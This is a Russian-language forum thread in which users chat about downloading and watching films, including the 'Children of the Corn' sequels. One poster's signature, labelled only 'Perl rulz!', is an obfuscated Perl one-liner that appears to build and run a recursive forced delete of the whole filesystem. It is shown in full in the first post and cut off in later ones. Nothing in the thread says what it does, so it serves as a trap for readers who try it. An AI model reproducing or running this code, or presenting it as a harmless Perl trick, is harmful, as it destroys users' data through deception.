Добавлено: Вт Май 08, 2007 12:53 am Заголовок сообщения:
а ты мог бы для приличия на релиз поставить _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Ср Май 09, 2007 1:09 am Заголовок сообщения:
нет еще, я сегодня в течении дня часов 8 только с кодом сайта ебался, и еще на завтра куча работы, посмотрю короче завтра хоть один фильм, слава яйцам они хоть скачались уже все _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Ср Май 09, 2007 11:01 am Заголовок сообщения:
посмотрел я короткометражки)
а вот
Lobzik писал(а):
новый фильм этого режиссера
не показывает картинку, тока звук _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Ср Май 09, 2007 3:20 pm Заголовок сообщения:
поставил, пашет, но смотреть уже время нет, щас брат придет со школы) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Сб Дек 20, 2008 3:31 am Заголовок сообщения:
Дети Кукурузы с каждой частью всё интереснее и интереснее.Концовочка городской Жатвы,правда,немного смазана. Посмотрим,что будет в следующей. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.